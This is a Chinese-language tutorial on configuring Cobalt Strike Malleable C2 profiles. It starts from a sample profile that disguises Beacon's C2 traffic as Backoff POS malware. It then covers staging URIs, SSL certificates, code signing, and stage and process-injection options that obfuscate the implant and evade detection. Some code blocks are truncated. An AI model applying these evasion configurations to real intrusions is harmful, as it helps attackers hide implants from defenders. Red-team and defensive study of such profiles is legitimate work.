以 backoff.profile
# Backoff POS Malware
# This profile takes steps to dress up the POST side of Beacon's C2 to
# look like Backoff. The GET side is left generic.
# Indicators from:
# http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html
# https://gsr.trustwave.com/topics/backoff-pos-malware/backoff-malware-overview/
# Author: @armitagehacker
set sample_name "Backoff POS Malware";
set sleeptime "30000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
# the relevant indicators
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
parameter "id";
output {
prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
server {
output {
# No information on backoff use of GET, so generic GET request.
http-get {
set uri "/updates";
client {
metadata {
prepend "user=";
header "Cookie";
server {
header "Content-Type" "text/plain";
output {
注释符号 #
选择赋值 set
用来设置一些程序的默认值 语句以;
代码中 set sleeptime "30000";
即为设置心跳时间为30000毫秒,set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
设置 user-agent 其中的http-get与http-post基本为固定语法了。
http-get {
set uri "/updates";
client {
metadata {
server {
header "";
output {
Statement | Action | Inverse |
append "string" | Append "string" | Remove last LEN("string") characters |
base64 | Base64 Encode | Base64 Decode |
base64url | URL-safe Base64 Encode | URL-safe Base64 Decode |
mask | XOR mask w/ random key | XOR mask w/ same random key |
netbios | NetBIOS Encode 'a' | NetBIOS Decode 'a' |
netbiosu | NetBIOS Encode 'A' | NetBIOS Decode 'A' |
prepend "string" | Prepend "string" | Remove first LEN("string") characters |
Statement | What |
header "header" | Store data in an HTTP header |
parameter "key" | Store data in a URI parameter |
Send data as transaction body | |
uri-append | Append to URI |
终止语句将转换后的数据储存到Http头中,参数终止语句将转换的数据 print来最后发送这些编码的数据
print是 http-get.server.output
和 http-stager.server.output
其他块使用 header
uri append
Beacon的Profile语法可以多个地方使用 Strings
Value | Special Value |
"\n" | Newline character |
"\r" | Carriage Return |
"\t" | Tab character |
"\u####" | A unicode character |
"\x##" | A byte (e.g., \x41 = 'A') |
"\" | \ |
Option | Context | Default Value | Changes |
amsi_disable | null | false | (Attempt to) disable AMSI for execute-assembly, powerpick, and psinject |
dns_idle | null | | IP address used to indicate no tasks are available to DNS Beacon; Mask for other DNS C2 values |
dns_max_txt | null | 252 | Maximum length of DNS TXT responses for tasks |
dns_sleep | null | 0 | Force a sleep prior to each individual DNS request. (in milliseconds) |
dns_stager_prepend | null | null | Prepend text to payload stage delivered to DNS TXT record stager |
dns_stager_subhost | null | .stage.123456. | Subdomain used by DNS TXT record stager. |
dns_ttl | null | 1 | TTL for DNS replies |
host_stage | null | true | Host payload for staging over HTTP, HTTPS, or DNS. Required by stagers. |
jitter | null | 0 | Default jitter factor (0-99%) |
maxdns | null | 255 | Maximum length of hostname when uploading data over DNS (0-255) |
pipename | null | msagent_## | Name of pipe to use for SMB Beacon's peer-to-peer communication. ## is replaced with a number unique to your team server. |
pipename_stager | null | status_## | Name of pipe to use for SMB Beacon's named pipe stager. ## is replaced with a number. |
sample_name | null | My Profile | The name of this profile (used in the Indicators of Compromise report) |
sleeptime | null | 60000 | Default sleep time (in milliseconds) |
spawnto_x86 | null | %windir%\syswow64\rundll32.exe | Default x86 program to open and inject shellcode into |
spawnto_x64 | null | %windir%\sysnative\rundll32.exe | Default x64 program to open and inject shellcode into |
tcp_port | null | 4444 | TCP Beacon listen port |
uri | http-get,http-post | [required option] | Transaction URI |
uri_x86 | http-stager | null | x86 payload stage URI |
uri_x64 | http-stager | null | x64 payload stage URI |
useragent | null | Internet Explorer (Random) | Default User-Agent for HTTP comms. |
verb | http-get,http-post | GET,POST | HTTP Verb to use for transaction |
以上都是简单的英语我也就懒的翻译了,使用URI可以将多个URI 指定为一个空格分隔的字符串,CS会自己处理。
HTTP请求 参数
Request | Component | Block | Data |
http-get | client | metadata | Session metadata |
http-get | server | output | Beacon's tasks |
http-post | client | id | Session ID |
http-post | client | output | Beacon's responses |
http-post | server | output | Empty |
http-stager | server | output | Encoded payload stage |
Beacon是一个分阶段的payload,有效负载由stager下载并注入内存,在目标内存中有Beacon之前HTTP GET和HTTP POST不会生效。 Malleable C2的http-stager块可自定义HTTP分段过程。
http-stager {
set uri_x86 "/get32.gif";
set uri_x64 "/get64.gif";
uri_x86选项设置URI下载x86的payload,uri_x64选项设置URI下载64位的payload 。
HTTPS Beacon在其通信中使用HTTP Beacon的指示符,Malleable C2配置文件还可以指定Beacon C2服务器的自签名SSL证书的参数。
https-certificate {
set CN "bobsmalware.com";
set O "Bob's Malware";
Option | Example | Description |
C | US | Country |
CN | beacon.cobaltstrike.com | Common Name; Your callback domain |
L | Washington | Locality |
O | Strategic Cyber LLC | Organization Name |
OU | Certificate Department | Organizational Unit Name |
ST | DC | State or Province |
validity | 365 | Number of days certificate is valid for |
可以选择将有效SSL证书与Beacon一起使用。使用Malleable C2配置文件指定Java密钥库文件和密码。此密钥库必须包含证书的私钥,根证书,任何中间证书以及SSL证书供应商提供的域证书。 Cobalt Strike在与Malleable C2配置文件相同的文件夹中找到Java Keystore文件。
https-certificate {
set keystore "domain.store";
set password "mypassword";
Option | Example | Description |
Option | Example | Description |
keystore | domain.store | Java Keystore file with certificate information |
password | mypassword | The password to your Java Keystore |
以下是创建用于Cobalt Strike的Beacon的有效SSL证书的步骤:
1.使用keytool程序创建Java密钥存储文件。这个程序会询问“你的姓名是什么?” 确保使用完全权威的域名来响应Beacon服务器。另外,请确保记下密钥库密码,你以后会需要它。
$ keytool -genkey -keyalg RSA -keysize 2048 -keystore domain.store
$ keytool -certreq -keyalg RSA -file domain.csr -keystore domain.store
$ keytool -import -trustcacerts -alias FILE -file FILE.crt -keystore domain.store
$ keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
就是这样就生成Cobalt Strike的Beacon一起使用的Java Keystore文件。
Attacks -> Packages -> Windows Executable and Windows Executable (S)
提供签署可执行文件或DLL文件的选项,需要 代码签名证书和私钥指定Java Keystore文件
code-signer {
set keystore "keystore.jks";
set password "password";
set alias "server";
Option | Example | Description |
alias | server | The keystore's alias for this certificate |
digest_algorithm | SHA256 | The digest algorithm |
keystore | keystore.jks | Java Keystore file with certificate information |
password | mypassword | The password to your Java Keystore |
timestamp | false | Timestamp the file using a third-party service |
timestamp_url | http://timestamp.digicert.com | URL of the timestamp service |
Malleable C2 stage http-stager 控制Beacon如何加载到内存中并编辑Beacon DLL的内容。
stage {
set userwx "false";
set compile_time "14 Jul 2009 8:14:00";
set image_size_x86 "512000";
set image_size_x64 "512000";
set obfuscate "true";
transform-x86 {
prepend "\x90\x90";
strrep "ReflectiveLoader" "DoLegitStuff";
transform-x64 {
# transform the x64 rDLL stage
stringw "I am not Beacon!";
当接受后将字符串添加到beacon dll的.rdata部分,string命令添加一个以zero-terminated的字符串。stringw命令添加了一个宽(utf-16le编码)字符串, Transform-x86和Transform-X64阻止PAD和Transform Beacon的反射DLL阶段。这些块支持三个命令:prepend、append和strrep. prepend命令在beacon的反射dll之前插入一个字符串,append命令在beacon-reflective dll后面添加一个字符串,确保预先准备好的数据是阶段体系架构(x86、x64)的有效代码,c2lint程序没有对此进行检查,strrep命令替换beacon反射dll中的字符串。
stage块接受Beacon DLL内容的选项:
Option | Example | Description |
checksum | 0 | The CheckSum value in Beacon's PE header |
cleanup | false | Ask Beacon to attempt to free memory associated with the Reflective DLL package that initialized it. |
compile_time | 14 July 2009 8:14:00 | The build time in Beacon's PE header |
entry_point | 92145 | The EntryPoint value in Beacon's PE header |
image_size_x64 | 512000 | SizeOfImage value in x64 Beacon's PE header |
image_size_x86 | 512000 | SizeOfImage value in x86 Beacon's PE header |
module_x64 | xpsservices.dll | Same as module_x86; affects x64 loader |
module_x86 | xpsservices.dll | Ask the x86 ReflectiveLoader to load the specified library and overwrite its space instead of allocating memory with VirtualAlloc. |
name | beacon.x64.dll | The Exported name of the Beacon DLL |
obfuscate | false | Obfuscate the Reflective DLL's import table, overwrite unused header content, and ask ReflectiveLoader to copy Beacon to new memory without its DLL headers. |
rich_header | null | Meta-information inserted by the compiler |
sleep_mask | false | Obfuscate Beacon, in-memory, prior to sleeping |
stomppe | true | Ask ReflectiveLoader to stomp MZ, PE, and e_lfanew values after it loads Beacon payload |
userwx | false | Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory |
Cobalt Strike的Linux软件包,包括一个工具peclone,用于从dll中提取头文件并将其显示为一个随时可用的阶段块:
./peclone [/path/to/sample.dll]
如果您担心在内存中初始化beacon dll的beacon阶段,请将cleanup设置为true。此选项将在不再需要信标阶段时释放与之关联的内存。
Malleable C2配置文件中的进程注入块可以注入内容并控制进程注入行为
process-inject {
set min_alloc "16384";
set startrwx "true";
set userwx "false";
transform-x86 {
prepend "\x90\x90";
transform-x64 {
# transform x64 injected content
disable "CreateRemoteThread";
Option | Example | Description |
min_alloc | 4096 | Minimum amount of memory to request for injected content |
startrwx | true | Use RWX as initial permissions for injected content. Alternative is RW. |
userwx | false | Use RWX as final permissions for injected content. Alternative is RX. |